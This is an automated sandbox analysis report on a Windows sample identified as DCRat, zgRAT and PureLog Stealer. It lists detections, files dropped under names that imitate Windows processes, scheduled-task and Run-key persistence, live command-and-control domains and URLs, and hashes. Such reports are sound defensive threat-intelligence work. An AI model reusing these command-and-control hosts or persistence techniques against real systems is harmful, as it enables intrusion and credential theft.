                                    Source: Yara match - File source: 00000006.00000000.1708671234.0000000000832000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match - File source: 00000001.00000003.1412731329.0000000007801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match - File source: 00000001.00000003.1412020893.0000000006E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match - File source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, type: DROPPED
                                    Source: Yara match - File source: C:\Blockcomcrt\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara match - File source: C:\Recovery\csrss.exe, type: DROPPED
                                    Source: Yara match - File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe, type: DROPPED
                                    Source: Yara match - File source: C:\Blockcomcrt\AgentMonitor.exe, type: DROPPED
                                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                    Gather Victim Identity Information | 11 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 11 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 3 File and Directory Discovery | 1 Taint Shared Content | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                                    Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 145 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
                                    Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 12 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 541 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                                    Employee Names | Virtual Private Server | Local Accounts | Cron | 21 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 14 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | LSA Secrets | 471 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 132 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 471 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    Behavior Graph ID: 1498678, Sample: Internal.exe, Startdate: 25/08/2024, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label | Link
Internal.exe | 68% | Virustotal | | Browse
Internal.exe | 76% | ReversingLabs | Win32.Trojan.DCRat |
Internal.exe | 100% | Avira | VBS/Runner.VPG |
Internal.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Blockcomcrt\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\Desktop\fXTLLrxO.log | 100% | Avira | HEUR/AGEN.1300079 |
C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\Desktop\wekqfedd.log | 100% | Avira | TR/PSW.Agent.qngqt |
C:\Users\user\AppData\Local\Temp\elmTxMluu5.bat | 100% | Avira | BAT/Delbat.C |
C:\Users\user\Desktop\mVSSSdRf.log | 100% | Avira | TR/PSW.Agent.qngqt |
C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe | 100% | Avira | VBS/Runner.VPG |
C:\Users\user\Desktop\bQCMLIKB.log | 100% | Avira | HEUR/AGEN.1300079 |
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Recovery\csrss.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Blockcomcrt\AgentMonitor.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\RypOpByW.log | 100% | Joe Sandbox ML | |
C:\Windows\System32\SecurityHealthSystray.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\UjoVbfCg.log | 100% | Joe Sandbox ML | |
C:\Blockcomcrt\WmiPrvSE.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\wekqfedd.log | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\mVSSSdRf.log | 100% | Joe Sandbox ML | |
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe | 100% | Joe Sandbox ML | |
C:\Recovery\csrss.exe | 100% | Joe Sandbox ML | |
C:\Blockcomcrt\AgentMonitor.exe | 100% | Joe Sandbox ML | |
C:\Blockcomcrt\AgentMonitor.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper |
C:\Blockcomcrt\AgentMonitor.exe | 55% | Virustotal | | Browse
C:\Blockcomcrt\WmiPrvSE.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper |
C:\Blockcomcrt\WmiPrvSE.exe | 55% | Virustotal | | Browse
C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper |
C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe | 55% | Virustotal | | Browse
C:\Recovery\csrss.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper |
C:\Recovery\csrss.exe | 55% | Virustotal | | Browse
C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper |
C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe | 55% | Virustotal | | Browse
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper |
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe | 55% | Virustotal | | Browse
C:\Users\user\Desktop\RypOpByW.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\RypOpByW.log | 11% | Virustotal | | Browse
C:\Users\user\Desktop\UjoVbfCg.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\UjoVbfCg.log | 11% | Virustotal | | Browse
C:\Users\user\Desktop\Vmjnufha.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\Vmjnufha.log | 29% | Virustotal | | Browse
C:\Users\user\Desktop\WuLVbyih.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\WuLVbyih.log | 27% | Virustotal | | Browse
C:\Users\user\Desktop\ZcxEZvOD.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\ZcxEZvOD.log | 27% | Virustotal | | Browse
C:\Users\user\Desktop\bQCMLIKB.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\bQCMLIKB.log | 22% | Virustotal | | Browse
C:\Users\user\Desktop\cQVCqZDT.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\cQVCqZDT.log | 29% | Virustotal | | Browse
C:\Users\user\Desktop\fXTLLrxO.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\fXTLLrxO.log | 22% | Virustotal | | Browse
C:\Users\user\Desktop\mVSSSdRf.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\mVSSSdRf.log | 69% | Virustotal | | Browse
C:\Users\user\Desktop\wekqfedd.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\wekqfedd.log | 69% | Virustotal | | Browse
                                    No Antivirus matches
Source | Detection | Scanner | Label | Link
373292cm.nyashka.top | 19% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
http://www.enigmaprotector.com/openU | 0% | Avira URL Cloud | safe |
http://373292cm.nyashka.top | 19% | Virustotal | | Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal | | Browse
http://373292cm.nyashka.top | 100% | Avira URL Cloud | malware |
http://www.enigmaprotector.com/openU | 0% | Virustotal | | Browse
https://duckduckgo.com/chrome_newtab | 0% | Virustotal | | Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
http://www.enigmaprotector.com/ | 0% | Avira URL Cloud | safe |
http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php | 100% | Avira URL Cloud | malware |
http://373292cm.nyashka.top/ | 100% | Avira URL Cloud | malware |
http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php | 18% | Virustotal | | Browse
https://duckduckgo.com/ac/?q= | 0% | Virustotal | | Browse
http://373292cm.nyashka.top/ | 19% | Virustotal | | Browse
http://www.enigmaprotector.com/ | 0% | Virustotal | | Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
373292cm.nyashka.top | 80.211.144.156 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php | true | 18%, Virustotal, Browse; Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.dr | false | URL Reputation: safe; URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://373292cm.nyashka.top | yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.0000000003582000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.000000000359F000.00000004.00000800.00020000.00000000.sdmp | true | 19%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.dr | false | URL Reputation: safe | unknown
http://www.enigmaprotector.com/openU | Internal.exe, 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://373292cm.nyashka.top/ | yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmp | true | 19%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.dr | false | URL Reputation: safe | unknown
http://www.enigmaprotector.com/ | Internal.exe, 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.dr | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | AgentMonitor.exe, 00000006.00000002.1759873239.00000000031DA000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.dr | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
80.211.144.156 | 373292cm.nyashka.top | Italy | | 31034 | ARUBA-ASNIT | true
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1498678
                                    Start date and time:2024-08-25 15:44:06 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 43s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:46
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Internal.exe
                                    Detection:MAL
                                    Classification:mal100.spre.troj.spyw.expl.evad.winEXE@52/68@1/1
                                    EGA Information:
                                    • Successful, ratio: 33.3%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, WmiPrvSE.exe, StartMenuExperienceHost.exe
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target AgentMonitor.exe, PID 5612 because it is empty
                                    • Execution Graph export aborted for target AgentMonitor.exe, PID 5904 because it is empty
                                    • Execution Graph export aborted for target WmiPrvSE.exe, PID 4032 because it is empty
                                    • Execution Graph export aborted for target csrss.exe, PID 2920 because it is empty
                                    • Execution Graph export aborted for target csrss.exe, PID 6856 because it is empty
                                    • Execution Graph export aborted for target yxeaYbTPMzNPCanFqSswYWhX.exe, PID 4788 because it is empty
                                    • Not all processes were analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
09:45:44 | API Interceptor | 201933x Sleep call for process: yxeaYbTPMzNPCanFqSswYWhX.exe modified
15:45:34 | Task Scheduler | Run new task: yxeaYbTPMzNPCanFqSswYWhX path: "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"
15:45:34 | Task Scheduler | Run new task: yxeaYbTPMzNPCanFqSswYWhXy path: "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"
15:45:37 | Task Scheduler | Run new task: AgentMonitor path: "C:\Blockcomcrt\AgentMonitor.exe"
15:45:37 | Task Scheduler | Run new task: AgentMonitorA path: "C:\Blockcomcrt\AgentMonitor.exe"
15:45:37 | Task Scheduler | Run new task: csrss path: "C:\Recovery\csrss.exe"
15:45:37 | Task Scheduler | Run new task: csrssc path: "C:\Recovery\csrss.exe"
15:45:37 | Task Scheduler | Run new task: StartMenuExperienceHost path: "C:\Users\Default\Recent\StartMenuExperienceHost.exe"
15:45:37 | Task Scheduler | Run new task: StartMenuExperienceHostS path: "C:\Users\Default\Recent\StartMenuExperienceHost.exe"
15:45:37 | Task Scheduler | Run new task: WmiPrvSE path: "C:\Blockcomcrt\WmiPrvSE.exe"
15:45:37 | Task Scheduler | Run new task: WmiPrvSEW path: "C:\Blockcomcrt\WmiPrvSE.exe"
15:45:38 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run yxeaYbTPMzNPCanFqSswYWhX "C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe"
15:45:46 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Blockcomcrt\WmiPrvSE.exe"
15:45:54 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Recovery\csrss.exe"
15:46:03 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Users\Default\Recent\StartMenuExperienceHost.exe"
15:46:11 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AgentMonitor "C:\Blockcomcrt\AgentMonitor.exe"
15:46:19 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run yxeaYbTPMzNPCanFqSswYWhX "C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe"
15:46:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Blockcomcrt\WmiPrvSE.exe"
15:46:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Recovery\csrss.exe"
15:46:44 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Users\Default\Recent\StartMenuExperienceHost.exe"
15:46:52 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AgentMonitor "C:\Blockcomcrt\AgentMonitor.exe"
15:47:00 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run yxeaYbTPMzNPCanFqSswYWhX "C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe"
15:47:09 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Blockcomcrt\WmiPrvSE.exe"
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
80.211.144.156 | Fatality.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
80.211.144.156 | Nerolore.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
80.211.144.156 | SpotifyStartupTask.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 973800cm.nyashsens.top/SecureBigloadServerDefaulttestdlepublic.php
80.211.144.156 | SpotifyStartupTask2.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 572335cm.n9sh.top/CpuserverAsyncuniversal.php
80.211.144.156 | BxV2vsnP6f.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | fizika.top/vmphp_geoUpdateProtectBasecdn.php
80.211.144.156 | loader.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 782652cm.n9sh.top/providerImageProcessorGeneratorwp.php
80.211.144.156 | MIDNIGHT.exe | Get hash | malicious | DCRat, PureLog Stealer, XWorm, zgRAT | Browse | 782652cm.n9sh.top/providerImageProcessorGeneratorwp.php
80.211.144.156 | b5d8kjYEBH.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 951499cm.nyashtech.top/sqlcentralUploads.php
80.211.144.156 | cBEWDhqv1r.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 389075cm.n9sh.top/tolowProcessserverwindowsFlowertesttrackWpUploads.php
80.211.144.156 | A6CuqcjdpG.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 951499cm.nyashtech.top/sqlcentralUploads.php
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
373292cm.nyashka.top | Fatality.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
373292cm.nyashka.top | Nerolore.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
373292cm.nyashka.top | jW5TA1J9Z1.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ARUBA-ASNIT | Fatality.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | Nerolore.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | SpotifyStartupTask.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | SpotifyStartupTask2.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | BxV2vsnP6f.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | loader.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | MIDNIGHT.exe | Get hash | malicious | DCRat, PureLog Stealer, XWorm, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | b5d8kjYEBH.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | cBEWDhqv1r.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | A6CuqcjdpG.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
                                    No context
                                    No context
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with very long lines (828), with no line terminators
                                    Category:dropped
                                    Size (bytes):828
                                    Entropy (8bit):5.907388885418277
                                    Encrypted:false
                                    SSDEEP:12:rvdWTsc7Kne+oljBCkr7XFYz+wxLGtnWutaeTFAfRWE8cYvWOfAA0et7dYYD8:rdW4n3olskXoGImRRATtYJfJ3tZl4
                                    MD5:3E42F41AD20FF4720C45648AA467C704
                                    SHA1:871AB8BA56204918147DBD61E9880B6CA095B134
                                    SHA-256:DAD30EC481D6F6C1C985142C1771633161F35EF53D9883822706B8F2323E93B0
                                    SHA-512:273952F5F69D049FFFFC64F5FEDFDFC4955795626C22084A91C568E19808D68398D70806C41D0598F6D7B1C81428FD9614CCF2181388CB221933254A20CDD384
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\Internal.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1961472
                                    Entropy (8bit):7.549799688187276
                                    Encrypted:false
                                    SSDEEP:49152:UHvZQJjZ5ic+4lTZrOpYwGRzHsHgZqa27K/C1eRLOW:UHRQJjZUd4lTpOrGRzHsAgaAYC1A
                                    MD5:84072063FC067434706597D88E3252A9
                                    SHA1:44604B1659DE7CE81DF818EF3C9ADE92FA90A0CC
                                    SHA-256:353A6E5793B9F96C00A6AF70515D7671930F4B280F3B74BA03646B005F0E4918
                                    SHA-512:27E7BF98241695165A4C38CB6563639DB64EE1DC05F253ECF7AA5251C5073BEA5636C84003CEC4C56686B495D22B295A2C86F1788C3C46C902B103843B68847D
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Blockcomcrt\AgentMonitor.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Blockcomcrt\AgentMonitor.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 55%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....l.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H....................... ...."..@........................................0..........(.... ........8........E........9...........8....(.... ....8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8........0..@....... ........8........E....Y.......}...........5.......8T.......~....(_...~....(c... ....<.... ........8....8.... ....~....{m...9....& ....8....8.... ....~....{b...:m...& ....8b......... ....~....{....9H...& ....8=...~....(W... .... .... ....s....~
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1961472
                                    Entropy (8bit):7.549799688187276
                                    Encrypted:false
